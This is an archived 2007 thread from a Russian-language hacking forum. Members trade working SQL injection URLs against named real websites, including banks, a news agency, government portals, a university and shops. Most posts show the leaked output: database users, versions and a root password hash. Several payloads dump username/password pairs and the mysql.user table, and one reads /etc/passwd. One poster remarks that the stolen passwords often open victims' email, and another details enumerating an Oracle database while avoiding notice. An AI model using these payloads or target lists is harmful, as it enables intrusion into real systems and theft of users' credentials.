ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.10.2007, 17:25
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.tete.fi/regsystem/event.php?e_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*
tete.fi@62.73.59.250:4.0.27-standard-log:tetefi
Код:
http://www.cablemaster.ru/SHOP/shp_warlist.php?action=list&b_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
4.1.18-log root:*F50E7C5E4FEF168E91C3573602248FD8CA82571A
Код:
http://www.ohot-prostory.ru/show_b.php?b_id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*&type=2
4.1.18-log
Код:
http://www.cjes.ru/actions/action.php?p_id=-1'/**/union/**/select/**/1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9/*
4.1.18
Код:
http://afisha.newacropol.ru/showplace.php?p_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12/*
afisha@hosting1.atanor.ru:4.1.22-log:afisha
Код:
http://www.melan.gazinter.net/Forum/view.php?m_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*
melandb@localhost:4.1.22-log:melan
Код:
http://www.vesakday.net/vesak50/messages_details.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9/*&trnslang=th
vesak50@localhost:5.1.17-beta-log:vesak50
Код:
http://cen.iatp.org.ua/virtual/job/boardua/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*
cen@hosting.iatp.org.ua:4.1.22:cen
Код:
http://www.adm-km.gov.ua/forum/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*
admkmgovua@localhost:4.0.27:admkmgovua |
|
|
18.10.2007, 18:59
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Банк "Объединенный Капитал"
http://www.okbank.ru/index.php?p=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13, 14,15/*
Version: 4.1.20-lk-log
User: okbankru_site@localchost
|
|
|
|
18.10.2007, 19:11
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
ankil.ru
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,concat(username,0x2F,password),3 ,4,5,6,7,8,9,10,11,12,13+from+dokeos_main.user+lim it+0,1/*
логин\хеш
Еще есть таблица юзеров форума itaf_user в базе ita-forum, но запрос к ней выводит ошибку вероятно из-за тире в имени базы. Что с этим делать не знаю. Подскажите кто знает
|
|
|
|
18.10.2007, 19:14
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.
|
|
|
|
18.10.2007, 20:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от groundhog
С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.
Может и так, но на скуль
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +ita-forum.itaf_user/*
ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3
------------------------------------------------------------------
|
|
|
|
19.10.2007, 14:53
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
http://www.operator.vesti.ru/
Слепой SQL-Injection с фильтруемой кавычкой на сайте информационного агентства "ВЕСТИ". В Oracle имеется куча таблиц, куча схем, коммерческая информация... В общем очень большой объём. Вникать что к чему не было времени. Кому интересно - разбирайтесь. Атака была начата с поддомена чтобы не светиться особо с багой.
По характерному поведению удалось выяснить, что там крутится Oracle:
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=1+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=2+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=3+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=4+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=5+--+
Oracle9i Enterprise Edition Release 9.2.0.4.0 - 64bit Production
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Solaris: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+USER,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+DUAL+--+
Пользователь, от которого работает пага: www
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.UN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,USERNAME+UN +FROM+ALL_USERS)+T+WHERE+R=X+--+
Можем посмотреть других порегеных пользователей: UTRO, RTRSALE, CULTTV, CULTRADIO, CULTGDRZ, RADIORUS, CULTCORP, CAMERAMAN, AGENCY, RMANCAT, EXPORTER, WWW, SSL, BVB, ALINA, NIKOLAEVA, OPERATOR, LOADER, KIRA_CH, NEWSUN, GENE, BELKINA, ANGELINA, IGRITSKY, BABINTSEVA, BEREZHANSKII, LOGUNOV, PRIOROV, BIRD, FISHER, RYABOVA, ANDREEVA, MALASH, TITOVA, YUDINA, ELIAS, TRAVINSKAYA, SKOPINCEVA, ARTUR, DENIS и т.д.
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN||CHR(32)||CHR(45)||CHR(32)|| T.O,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+F ROM+(SELECT+ROWNUM+R,TABLE_NAME+TN,OWNER+O+FROM+AL L_TABLES)+T+WHERE+R=X+--+
Смотрим таблиц и овнеров таблиц. Не забываем, что наш овнер - www
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,TABLE_NAME+ TN+FROM+ALL_TABLES+WHERE+OWNER=CHR(..)||...||CHR(. ..))+T+WHERE+R=X+--+
Можем смотреть таблицы по определённому овнеру. Овнера разумеется посимвольно заворачиваем в CHR().
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.CN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+COLUMN_NAME+FROM+USE R_TAB_COLUMNS+WHERE+TABLE_NAME=CHR(70)||CHR(85)||C HR(83)||CHR(69)||CHR(82)||CHR(83))+T+WHERE+R=X+--+
Так можно смотреть имена полей таблиц на примере таблицы FUSERS.
|
|
|
|
19.10.2007, 16:13
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Для любителей джаза
код:
http://www.souljazzrecords.co.uk/releases/?id=4973+union+select+1,concat(password,0x3a,email ),3,4,5,6,7,8,9,10,11,12,13,14+from+accounts+limit +3907,1/*
в поле логина вводить емейл
p.s в большинстве случаев пароли так-же подходят к почтовым ящикам  |
|
|
|
19.10.2007, 18:01
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Северо-Восточный Инвестиционный Банк
http://www.svib.ru/ru/news/index.php?id=-18+union+select+1,2,3,VERSION(),5,6,7 ,8,9,10/*
User: svib_www1@v52.valuehost.ru
Version: 4.0.27-max-log
|
|
|
|
19.10.2007, 18:24
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760
Репутация:
62
|
|
Код:
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,Username,userpass),9+from+hpsas_recsports.Tigeradmin_Users/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user,password),9+from+mysql.user/*
Код:
http://www.essor.gov.ml/cgi-bin/view_article.pl?id=-1+union+select+1,user,password,4,5,6,7,8,9+from+mysql.user--
|
|
|
|
19.10.2007, 20:37
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.gelyon.ru/news.php?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6/*
4.0.26/wwwgelyonru/gelyon@box.hc.ru
http://www.head-hunting.ru/z_parser.php?base_name=headhunting_second&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*
4.1.21-log/db00084672/00084672@localhost
http://www.solange.ru/gallery/show.phtm?s=14&z=0&t=-1+union+select+concat(version(),0x2F,database(),0x 2F,user()),2,3,4,5,6,7,8,9,10/*
4.1.21-standard/intermoda/intermoda@83.69.224.34
http://www.chernomor.com/vzrosltours.php?tp=1&obj=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,d atabase(),0x2F,user()),8,9,10/*
4.1.22-standard/chernomo_main/chernomo_main@localhost
http://fest.camps.su/event.php?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4/*
4.1.21-standard-log/campssu_main/campssu_user@localhost
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
